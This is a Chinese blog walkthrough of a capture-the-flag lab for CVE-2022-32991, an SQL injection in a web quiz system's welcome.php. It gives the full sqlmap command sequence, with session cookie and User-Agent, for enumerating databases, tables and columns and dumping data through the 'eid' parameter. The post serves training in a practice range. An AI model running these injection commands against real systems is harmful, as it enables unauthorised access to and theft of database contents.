春秋云境靶场之CVE-2022-32991

于 2024-09-13 22:46:12 发布
阅读量550 收藏 8
点赞数 24
分类专栏: 春秋云境靶场 文章标签: 春秋云境靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/142228328
版权

一.访问靶场

1.打开靶场环境

提示我们存在SQL,那么我们就进行SQL注入

2.访问靶场

http://eci-2ze2pi1s2m6ut2vkoyzl.cloudeci1.ichunqiu.com/

我们可以看到一个登录页面,但是我们没有用户名和密码

右下角可以进行注册,我们注册一个账号

3.注册用户名

然后我们进行登录,登录成功

二.SQL注入

1.测试注入点

我们可以看到有3个页面,我们进行访问,可以看到第2个页面和第3个页面的eid不一样,但是n和t是一样的

可以猜测存在SQL注入,我们使用sqlmap进行测试,这里一个知识点,我们不能直接进行注入,如果我们直接输入Login | Online Quiz Systemicon-default.png?t=O83Ahttp://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10这个链接的话是注入不成功的,因为它是一个登录页面,需要身份验证,所以我们必须加入User-Agent和cookie

我们通过burp进行抓包,查看cookie

正确的测试点是

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b",我们可以看到存在SQL注入

2.爆破数据库

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" --dbs --batch

我们可以看到有4个数据库,其中一个是flag,我们进行爆破

3.爆破表名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" --tables --batch

表名有9个,我们还是爆破flag

4.爆破字段名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" --columns

字段名是flag,那么我们直接爆破即可

5.爆破数据名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" -C "flag" --dump

我们可以看到flag,进行提交即可

MS02423
关注
专栏目录
春秋云境CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境CVE-2022-32991
一只爱吃橙子的羊
11-29 936
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
春秋云境 CVE-2022-4230过关
weixin_49898946的博客
05-02 1805
春秋云境 CVE-2022-4230 获取flag
春秋云境靶场CVE-2022-28525
qq_52923396的博客
07-06 240
CVE-2022-28525 (ED01-CMS v20180505 存在任意文件上传漏洞)4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包。在users/view all users 找到上传页面,6、审查图片元素发现文件路径在/images/ 路径下。3、因为是任意文件上传漏洞,在各页面查找上传接口。2、尝试弱口令admin/admin登录。test.php内容如下。
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1309
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境CVE-2022-32991靶场WP
果粒程
11-25 548
春秋云境CVE-2022-32991靶场WP
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2641
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境CVE-2022-30887
一只爱吃橙子的羊
11-29 4078
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-28525复现文档(巨详细,零基础复现)
10-14
CVE-2022-28525 复现文档 本文档旨在详细介绍 CVE-2022-28525 的复现过程,涵盖了靶场的设置、用户名和密码的爆破、木马的上传、文件上传的修改、终端连接等多个方面,旨在帮助读者深入理解漏洞的原理和利用方法。 ...
春秋云境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1041
春秋云境.com】CVE-2022-32991思路
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 472
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云境CVE-2022-29464
09-05
- *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
春秋云境CVE-2022-23880
11-29
根据提供的引用内容,春秋云境是一个靶场,其中包含了一个名为taoCMS v3.0.2的文件管理系统,该系统存在任意文件上传漏洞CVE-2022-23880。攻击者可以利用该漏洞上传恶意文件并执行任意代码。如果您想了解更多关于该...
KKобтьу╬kkx.net.url
最新发布
09-14
KKобтьу╬kkx.net.url
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
09-14
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用
09-14
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用。 开发测试环境: Embarcadero Delphi XE Version 15.0.3890.34076 IntraWeb 14.0.32 Firebird 2.5.9 (Windows Build) 注:本delphi源代码参考官方文档,修改测试而成,都是本人实验成功的。(本人CSDN的ID:i8013)
基于Springboot和Mysql的汽车销售网代码,包括程序,中文注释,配置说明操作步骤
09-14
汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网 1、资源说明:汽车销售网源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、M
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值